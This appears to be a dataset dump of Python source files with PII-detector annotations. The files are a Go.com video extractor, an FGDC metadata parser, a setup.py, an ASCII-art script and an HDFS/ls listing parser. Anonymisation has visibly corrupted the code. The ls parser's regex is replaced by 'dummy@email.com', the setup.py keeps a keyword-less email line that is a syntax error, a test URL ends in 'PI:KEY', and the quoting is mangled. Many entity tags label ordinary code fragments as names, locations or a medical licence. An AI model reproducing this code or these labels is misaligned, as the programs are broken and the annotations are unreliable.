'ci4.inputs.fo'], ['URL', 'ci4.in'], ['URL', 'ci4.in'], ['URL', 'ci4.inputs.mo'], ['URL', 'ci4.inputs.no'], ['URL', 'ci4.inputs.ro'], ['URL', 'ci4.inputs.so'], ['URL', 'ci4.inputs.so'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'config.se'], ['URL', 'nib.Com'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'config.se'], ['URL', 'ci3.ru'], ['URL', 'ci3.in'], ['URL', 'res.ru'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.pa'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'dict.it']]"
53,"# coding: utf-8
from __future__ import unicode_literals
import re
from .adobepass import AdobePassIE
from ..utils import (
int_or_none,
determine_ext,
parse_age_limit,
urlencode_postdata,
ExtractorError,
)
class GoIE(AdobePassIE):
_SITE_INFO = {
'abc': {
'brand': '001',
'requestor_id': 'ABC',
},
'freeform': {
'brand': '002',
'requestor_id': 'ABCFamily',
},
'watchdisneychannel': {
'brand': '004',
'requestor_id': 'Disney',
},
'watchdisneyjunior': {
'brand': '008',
'requestor_id': 'DisneyJunior',
},
'watchdisneyxd': {
'brand': '009',
'requestor_id': 'DisneyXD',
}
}
_VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys())
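# Example matches (URLs hypothetical): 'http://abc.go.com/show/vdka1234567'
# captures sub_domain='abc' and id='1234567', while
# 'http://abc.go.com/show/episode-guide/season-2/3-some-episode' captures
# display_id='3-some-episode' instead.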
_TESTS = [{
'url': 'http://abc.go.PI:KEY',
'info_dict': {
'id': '0_g86w5onx',
'ext': 'mp4',
'title': 'Sneak Peek: Language Arts',
'description': 'PI:KEY',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',
'only_matching': True,
}]
def _real_extract(self, url):
sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
if not video_id:
webpage = self._download_webpage(url, display_id)
video_id = self._search_regex(
# There may be inner quotes, e.g. data-video-id="'VDKA3609139'"
# from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id')
site_info = self._SITE_INFO[sub_domain]
brand = site_info['brand']
video_data = self._download_json(
'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id),
video_id)['video'][0]
title = video_data['title']
formats = []
for asset in video_data.get('assets', {}).get('asset', []):
asset_url = asset.get('value')
if not asset_url:
continue
format_id = asset.get('format')
ext = determine_ext(asset_url)
if ext == 'm3u8':
video_type = video_data.get('type')
data = {
'video_id': video_data['id'],
'video_type': video_type,
'brand': brand,
'device': '001',
}
if video_data.get('accesslevel') == '1':
requestor_id = site_info['requestor_id']
resource = self._get_mvpd_resource(
requestor_id, title, video_id, None)
auth = self._extract_mvpd_auth(
url, video_id, requestor_id, resource)
data.update({
'token': auth,
'token_type': 'ap',
'adobe_requestor_id': requestor_id,
})
else:
self._initialize_geo_bypass(['US'])
entitlement = self._download_json(
'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers())
errors = entitlement.get('errors', {}).get('errors', [])
if errors:
for error in errors:
if error.get('code') == 1002:
self.raise_geo_restricted(
error['message'], countries=['US'])
error_message = ', '.join([error['message'] for error in errors])
raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
asset_url += '?' + entitlement['uplynkData']['sessionKey']
formats.extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
else:
f = {
'format_id': format_id,
'url': asset_url,
'ext': ext,
}
if re.search(r'(?:/mp4/source/|_source\.mp4)', asset_url):
f.update({
'format_id': ('%s-' % format_id if format_id else '') + 'SOURCE',
'preference': 1,
})
else:
mobj = re.search(r'/(\d+)x(\d+)/', asset_url)
if mobj:
height = int(mobj.group(2))
f.update({
'format_id': ('%s-' % format_id if format_id else '') + '%dP' % height,
'width': int(mobj.group(1)),
'height': height,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {}
for cc in video_data.get('closedcaption', {}).get('src', []):
cc_url = cc.get('value')
if not cc_url:
continue
ext = determine_ext(cc_url)
if ext == 'xml':
ext = 'ttml'
subtitles.setdefault(cc.get('lang'), []).append({
'url': cc_url,
'ext': ext,
})
thumbnails = []
for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
thumbnail_url = thumbnail.get('value')
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('longdescription') or video_data.get('description'),
'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
'episode_number': int_or_none(video_data.get('episodenumber')),
'series': video_data.get('show', {}).get('title'),
'season_number': int_or_none(video_data.get('season', {}).get('num')),
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
",6904,"[['MEDICAL_LICENSE', 'ka3335601'], ['URL', ""http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',""], ['LOCATION', '.adobepass'], ['LOCATION', 'video_id, display_id ='], ['URL', 're.ma'], ['URL', 'asset.ge'], ['URL', 'self.ge'], ['URL', 're.se'], ['PERSON', ""mobj = re.search(r'/(\\d+)x(\\d+)/'""], ['URL', 'cc.ge'], ['URL', 'thumbnail.ge'], ['URL', 'thumbnail.ge'], ['PERSON', ""int_or_none(video_data.get('season""], ['URL', 'http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood'], ['URL', ""http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json'""], ['URL', ""https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',""], ['URL', 'INFO.ke'], ['URL', 'data.ge'], ['URL', 'asset.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'entitlement.ge'], ['URL', 'error.ge'], ['URL', 'self.IE'], ['URL', 're.se'], ['URL', 'mobj.gr'], ['URL', 'mobj.gr'], ['URL', 'data.ge'], ['URL', 'subtitles.se'], ['URL', 'cc.ge'], ['URL', 'data.ge'], ['URL', 'thumbnail.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge']]"
54,"# -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2010 Tom Kralidis
#
# Authors : Tom Kralidis dummy@email.com
#
# Contact email: dummy@email.com
# =============================================================================
"""""" FGDC metadata parser """"""
from __future__ import (absolute_import, division, print_function)
from owscapable.etree import etree
from owscapable import util
class Metadata(object):
"""""" Process metadata """"""
def __init__(self, md):
if hasattr(md, 'getroot'): # standalone document
self.xml = etree.tostring(md.getroot())
else: # part of a larger document
self.xml = etree.tostring(md)
self.idinfo = Idinfo(md)
self.eainfo = Eainfo(md)
self.distinfo = Distinfo(md)
self.metainfo = Metainfo(md)
if self.idinfo.datasetid:
self.identifier = self.idinfo.datasetid
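# Minimal usage sketch (file name hypothetical): parse an FGDC XML record
# and read a citation field.
#
#   md = Metadata(etree.parse('fgdc_record.xml'))
#   print(md.idinfo.citation.citeinfo['title'])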
class Idinfo(object):
"""""" Process idinfo """"""
def __init__(self, md):
val = md.find('idinfo/datasetid')
self.datasetid = util.testXMLValue(val)
val = md.find('idinfo/citation')
self.citation = Citation(val)
val = md.find('idinfo/descript')
if val is not None:
self.descript = Descript(val)
val = md.find('idinfo/timeperd')
self.timeperd = Timeperd(val)
val = md.find('idinfo/status')
if val is not None:
self.status = Status(val)
val = md.find('idinfo/spdom')
if val is not None:
self.spdom = Spdom(val)
val = md.find('idinfo/keywords')
if val is not None:
self.keywords = Keywords(val)
val = md.find('idinfo/accconst')
self.accconst = util.testXMLValue(val)
val = md.find('idinfo/useconst')
self.useconst = util.testXMLValue(val)
val = md.find('idinfo/ptcontac')
if val is not None:
self.ptcontac = Ptcontac(val)
val = md.find('idinfo/datacred')
self.datacred = util.testXMLValue(val)
val = md.find('idinfo/crossref')
self.crossref = Citation(val)
class Citation(object):
"""""" Process citation """"""
def __init__(self, md):
if md is not None:
self.citeinfo = {}
val = md.find('citeinfo/origin')
self.citeinfo['origin'] = util.testXMLValue(val)
val = md.find('citeinfo/pubdate')
self.citeinfo['pubdate'] = util.testXMLValue(val)
val = md.find('citeinfo/title')
self.citeinfo['title'] = util.testXMLValue(val)
val = md.find('citeinfo/geoform')
self.citeinfo['geoform'] = util.testXMLValue(val)
val = md.find('citeinfo/pubinfo/pubplace')
self.citeinfo['pubplace'] = util.testXMLValue(val)
val = md.find('citeinfo/pubinfo/publish')
self.citeinfo['publish'] = util.testXMLValue(val)
self.citeinfo['onlink'] = []
for link in md.findall('citeinfo/onlink'):
self.citeinfo['onlink'].append(util.testXMLValue(link))
class Descript(object):
"""""" Process descript """"""
def __init__(self, md):
val = md.find('abstract')
self.abstract = util.testXMLValue(val)
val = md.find('purpose')
self.purpose = util.testXMLValue(val)
val = md.find('supplinf')
self.supplinf = util.testXMLValue(val)
class Timeperd(object):
"""""" Process timeperd """"""
def __init__(self, md):
if md is not None:
val = md.find('current')
self.current = util.testXMLValue(val)
val = md.find('timeinfo')
if val is not None:
self.timeinfo = Timeinfo(val)
class Timeinfo(object):
"""""" Process timeinfo """"""
def __init__(self, md):
val = md.find('sngdate')
if val is not None:
self.sngdate = Sngdate(val)
val = md.find('rngdates')
if val is not None:
self.rngdates = Rngdates(val)
class Sngdate(object):
"""""" Process sngdate """"""
def __init__(self, md):
val = md.find('caldate')
self.caldate = util.testXMLValue(val)
val = md.find('time')
self.time = util.testXMLValue(val)
class Rngdates(object):
"""""" Process rngdates """"""
def __init__(self, md):
val = md.find('begdate')
self.begdate = util.testXMLValue(val)
val = md.find('begtime')
self.begtime = util.testXMLValue(val)
val = md.find('enddate')
self.enddate = util.testXMLValue(val)
val = md.find('endtime')
self.endtime = util.testXMLValue(val)
class Status(object):
"""""" Process status """"""
def __init__(self, md):
val = md.find('progress')
self.progress = util.testXMLValue(val)
val = md.find('update')
self.update = util.testXMLValue(val)
class Spdom(object):
"""""" Process spdom """"""
def __init__(self, md):
val = md.find('bounding/westbc')
self.westbc = util.testXMLValue(val)
val = md.find('bounding/eastbc')
self.eastbc = util.testXMLValue(val)
val = md.find('bounding/northbc')
self.northbc = util.testXMLValue(val)
val = md.find('bounding/southbc')
self.southbc = util.testXMLValue(val)
if (self.southbc is not None and self.northbc is not None and
self.eastbc is not None and self.westbc is not None):
self.bbox = Bbox(self)
class Bbox(object):
"""""" Generate bbox for spdom (convenience function) """"""
def __init__(self, spdom):
self.minx = spdom.westbc
self.miny = spdom.southbc
self.maxx = spdom.eastbc
self.maxy = spdom.northbc
class Keywords(object):
"""""" Process keywords """"""
def __init__(self, md):
self.theme = []
self.place = []
self.temporal = []
for i in md.findall('theme'):
theme = {}
val = i.find('themekt')
theme['themekt'] = util.testXMLValue(val)
theme['themekey'] = []
for j in i.findall('themekey'):
themekey = util.testXMLValue(j)
if themekey is not None:
theme['themekey'].append(themekey)
self.theme.append(theme)
for i in md.findall('place'):
place = {}
val = i.find('placekt')
place['placekt'] = util.testXMLValue(val)
place['placekey'] = []
for j in i.findall('placekey'):
place['placekey'].append(util.testXMLValue(j))
self.place.append(place)
for i in md.findall('temporal'):
temporal = {}
val = i.find('tempkt')
temporal['tempkt'] = util.testXMLValue(val)
temporal['tempkey'] = []
for j in i.findall('tempkey'):
temporal['tempkey'].append(util.testXMLValue(j))
self.temporal.append(temporal)
class Ptcontac(object):
"""""" Process ptcontac """"""
def __init__(self, md):
val = md.find('cntinfo/cntorgp/cntorg')
self.cntorg = util.testXMLValue(val)
val = md.find('cntinfo/cntorgp/cntper')
self.cntper = util.testXMLValue(val)
val = md.find('cntinfo/cntpos')
self.cntpos = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/addrtype')
self.addrtype = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/address')
self.address = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/city')
self.city = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/state')
self.state = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/postal')
self.postal = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/country')
self.country = util.testXMLValue(val)
val = md.find('cntinfo/cntvoice')
self.voice = util.testXMLValue(val)
val = md.find('cntinfo/cntemail')
self.email = util.testXMLValue(val)
class Eainfo(object):
"""""" Process eainfo """"""
def __init__(self, md):
val = md.find('eainfo/detailed/enttyp/enttypl')
self.enttypl = util.testXMLValue(val)
val = md.find('eainfo/detailed/enttyp/enttypd')
self.enttypd = util.testXMLValue(val)
val = md.find('eainfo/detailed/enttyp/enttypds')
self.enttypds = util.testXMLValue(val)
self.attr = []
for i in md.findall('eainfo/detailed/attr'):
attr = {}
val = i.find('attrlabl')
attr['attrlabl'] = util.testXMLValue(val)
val = i.find('attrdef')
attr['attrdef'] = util.testXMLValue(val)
val = i.find('attrdefs')
attr['attrdefs'] = util.testXMLValue(val)
val = i.find('attrdomv/udom')
attr['udom'] = util.testXMLValue(val)
self.attr.append(attr)
class Distinfo(object):
"""""" Process distinfo """"""
def __init__(self, md):
val = md.find('distinfo')
if val is not None:
val2 = val.find('stdorder')
if val2 is not None:
self.stdorder = {'digform': []}
for link in val2.findall('digform'):
digform = {}
digform['name'] = util.testXMLValue(link.find('digtinfo/formname'))
digform['url'] = util.testXMLValue(link.find('digtopt/onlinopt/computer/networka/networkr/'))
self.stdorder['digform'].append(digform)
class Metainfo(object):
"""""" Process metainfo """"""
def __init__(self, md):
val = md.find('metainfo/metd')
self.metd = util.testXMLValue(val)
val = md.find('metainfo/metrd')
self.metrd = util.testXMLValue(val)
val = md.find('metainfo/metc')
if val is not None:
self.metc = Ptcontac(val)
val = md.find('metainfo/metstdn')
self.metstdn = util.testXMLValue(val)
val = md.find('metainfo/metstdv')
self.metstdv = util.testXMLValue(val)
val = md.find('metainfo/metac')
self.metac = util.testXMLValue(val)
val = md.find('metainfo/metuc')
self.metuc = util.testXMLValue(val)
",10441,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Tom Kralidis'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'md):'], ['PERSON', 'md):\n val'], ['PERSON', 'self.timeperd = Timeperd(val'], ['PERSON', 'md):\n '], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n '], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('sngdate""], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('caldate""], ['PERSON', 'self.time = util.testXMLValue(val'], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('begdate""], ['PERSON', ""md.find('begtime""], ['PERSON', ""md.find('enddate""], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('update""], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'self.enttypd ='], ['PERSON', 'md):\n val'], ['URL', 'val2.fi'], ['URL', 'link.fi'], ['URL', 'link.fi'], ['PERSON', 'md):\n val'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'owscapable.et'], ['URL', 'etree.to'], ['URL', 'md.ge'], ['URL', 'etree.to'], ['URL', 'self.id'], ['URL', 'self.me'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.de'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ke'], ['URL', 'md.fi'], ['URL', 'self.ac'], ['URL', 'md.fi'], ['URL', 'self.us'], ['URL', 'md.fi'], ['URL', 'self.pt'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.cr'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.su'], ['URL', 'md.fi'], ['URL', 'self.cu'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.sn'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ca'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.pro'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.no'], ['URL', 'md.fi'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.no'], ['URL', 'self.bb'], ['URL', 'spdom.so'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'spdom.no'], ['URL', 'self.th'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.th'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.co'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'val.fi'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], 
['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me']]"
55,"import sys
from setuptools import setup
tests_require = [""nose>=1.0""]
if sys.version_info < (3,0):
tests_require = [""nose>=1.0"", ""mock""]
setup(
name=""unitils"",
version=""0.1.2"",
author=""iLoveTux"",
dummy@email.com"",
description=""Cross platform utilities I have found to be incredibly useful"",
license=""GPLv3"",
keywords=""utility tools cli"",
url=""http://github.com/ilovetux/unitils"",
packages=['unitils'],
install_requires=[""colorama""],
entry_points={
""console_scripts"": [
""cat.py=unitils.cli:cat"",
""cp.py=unitils.cli:cp"",
""find.py=unitils.cli:find"",
""grep.py=unitils.cli:grep"",
""head.py=unitils.cli:head"",
""ls.py=unitils.cli:ls"",
""mv.py=unitils.cli:mv"",
""watch.py=unitils.cli:watch"",
""wc.py=unitils.cli:wc"",
""which.py=unitils.cli:which"",
]
},
test_suite=""nose.collector"",
tests_require=tests_require,
classifiers=[
""Development Status :: 4 - Beta"",
""Topic :: Utilities"",
""License :: OSI Approved :: GNU General Public License v3 (GPLv3)"",
],
)
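# Once installed, each console_scripts entry above becomes an executable of
# the same name, e.g. "grep.py PATTERN file.txt" dispatches to
# unitils.cli:grep (invocation sketched here; exact flags live in unitils).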
",1171,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'GPLv3'], ['URL', 'http://github.com/ilovetux/unitils"",'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'sys.ve'], ['URL', 'email.com'], ['URL', 'cat.py'], ['URL', 'unitils.cl'], ['URL', 'cp.py'], ['URL', 'unitils.cl'], ['URL', 'find.py'], ['URL', 'unitils.cl'], ['URL', 'grep.py'], ['URL', 'unitils.cl'], ['URL', 'head.py'], ['URL', 'unitils.cl'], ['URL', 'ls.py'], ['URL', 'unitils.cl'], ['URL', 'mv.py'], ['URL', 'unitils.cl'], ['URL', 'watch.py'], ['URL', 'unitils.cl'], ['URL', 'wc.py'], ['URL', 'unitils.cl'], ['URL', 'which.py'], ['URL', 'unitils.cl'], ['URL', 'nose.co']]"
56,"#!/usr/bin/env python
# asciinator.py
#
# Copyright 2014 Christian Diener dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
from __future__ import print_function # for python2 compat
import sys
from PIL import Image
import numpy as np
# ascii chars sorted by ""density""
chars = np.asarray(list(' .,:;irsXA253hMHGS#9B&@'))
# check command line arguments
if len(sys.argv) != 4:
print( 'Usage: asciinator.py image scale factor' )
sys.exit()
# set basic program parameters
# f = filename, SC = scale, GCF = gamma correction factor, WCF = width correction factor
f, SC, GCF, WCF = sys.argv[1], float(sys.argv[2]), float(sys.argv[3]), 7.0/4.0
# open, scale and normalize image by pixel intensities
img = Image.open(f)
S = (int(img.size[0]*SC*WCF), int(img.size[1]*SC))
img = np.sum(np.asarray(img.resize(S), dtype="float"), axis=2)
img -= img.min()
img = (1.0 - img/img.max())**GCF*(chars.size-1)
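# Each pixel now holds an index into `chars`: intensities are normalised to
# [0, 1], inverted so darker pixels pick denser glyphs, gamma-corrected by
# GCF, then scaled to the index range 0..len(chars)-1.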
# Assemble and print ascii art
print( ""\n"".join(("""".join(r) for r in chars[img.astype(int)])))
print()
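# Example invocation (image name hypothetical):
#   python asciinator.py photo.jpg 0.1 1
# renders photo.jpg at 10% scale with no extra gamma correction.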
",1717,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Christian Diener'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['LOCATION', 'SC'], ['LOCATION', 'SC'], ['URL', 'asciinator.py'], ['URL', 'email.com'], ['URL', 'np.as'], ['URL', 'sys.ar'], ['URL', 'asciinator.py'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'img.si'], ['URL', 'img.si'], ['URL', 'np.su'], ['URL', 'np.as'], ['URL', 'img.re'], ['URL', 'img.ma'], ['URL', 'chars.si'], ['URL', 'img.as']]"
57,"#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
from time import strptime
import re
import os
import json
class FileStatus(object):
def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):
self.path = path
self.rights = rights
self.nbFiles = nbFiles
self.owner = owner
self.group = group
self.size = size
self.date = date
self.relpath = relpath
def __eq__(self, other):
return (self.path == other.path and self.rights == other.rights and
self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and
self.size == other.size and self.date == other.date)
def is_dir(self):
return self.rights.startswith("d")
def __str__(self):
return self.to_str(0, 0, 0, 0, 0, 0, 0)
def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_width):
if self.is_dir():
nb_files = "-"
else:
nb_files = str(self.nbFiles)
result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width),
nb_files.ljust(nbFiles_width),
self.owner.ljust(owner_width),
self.group.ljust(group_width),
str(self.size).ljust(size_width),
self.date.strftime("%Y-%m-%d %H:%M").ljust(date_width),
self.path.ljust(path_width))
return result.encode("utf-8")
def get_file_statuses_pretty_print(file_statuses):
rights_width = 0
nb_files_width = 0
owner_width = 0
group_width = 0
size_width = 0
date_width = 0
path_width = 0
if len(file_statuses) != 0:
rights_width = max([len(fs.rights) for fs in file_statuses])
nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])
owner_width = max([len(fs.owner) for fs in file_statuses])
group_width = max([len(fs.group) for fs in file_statuses])
size_width = max([len(str(fs.size)) for fs in file_statuses])
date_width = max([len(fs.date.strftime("%Y-%m-%d %H:%M")) for fs in file_statuses])
path_width = max([len(fs.path) for fs in file_statuses])
result = []
for file_status in file_statuses:
result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))
return ""\n"".join(result)
class LsParser(object):
def __init__(self):
pass
def parse_line(self, line):
regex = ""^(dummy@email.com)$""
m = re.match(regex, line, re.UNICODE)
if m is None:
return None
rights = m.group(1)
nbFiles = int(m.group(2))
owner = m.group(3)
group = m.group(4)
size = int(m.group(5))
day = int(m.group(6))
month = m.group(7)
try:
month = strptime(month, '%b').tm_mon
except:
month = [u""jan"", u""fév"", u""mar"", u""avr"", u""mai"", u""jui"", u""juil"", u""aoû"", u""sep"", u""oct"", u""nov"", u""déc""].index(month) + 1
try:
year = int(m.group(8))
except:
year = datetime.datetime.now().year
filename = m.group(9)
date = datetime.date(year, month, day)
return FileStatus(filename, rights, nbFiles, owner, group, size, date)
def parse(self, output):
result = [self.parse_line(line) for line in output.split("\n")]
return [p for p in result if p is not None]
class WebHdfsParser(object):
def __init__(self, path):
self.path = path
def permissions_to_unix_name(self, is_dir, rights):
is_dir_prefix = 'd' if is_dir else '-'
sticky = False
if len(rights) == 4 and rights[0] == '1':
sticky = True
rights = rights[1:]
dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
result = is_dir_prefix + ''.join(dic[x] for x in rights)
if sticky:
result = result[:-1] + "t"
return result
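# For example, permissions_to_unix_name(True, '1755') yields 'drwxr-xr-t':
# the leading '1' marks the sticky bit and '755' expands digit by digit.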
def parse_status(self, status):
relpath = status[""pathSuffix""]
path = os.path.join(self.path, relpath)
nbFiles = 0
size = status[""length""]
owner = status[""owner""]
group = status[""group""]
is_dir = status[""type""] == ""DIRECTORY""
right_digits = status[""permission""]
rights = self.permissions_to_unix_name(is_dir, right_digits)
parsed_date = datetime.datetime.utcfromtimestamp(int(status[""modificationTime""])/1000)
date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)
return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)
def parse(self, output):
try:
j = json.loads(output)
except:
print output
return []
if ""FileStatuses"" not in j or ""FileStatus"" not in j[""FileStatuses""]:
print j
return []
statuses = j[""FileStatuses""][""FileStatus""]
result = []
for status in statuses:
result.append(self.parse_status(status))
return result
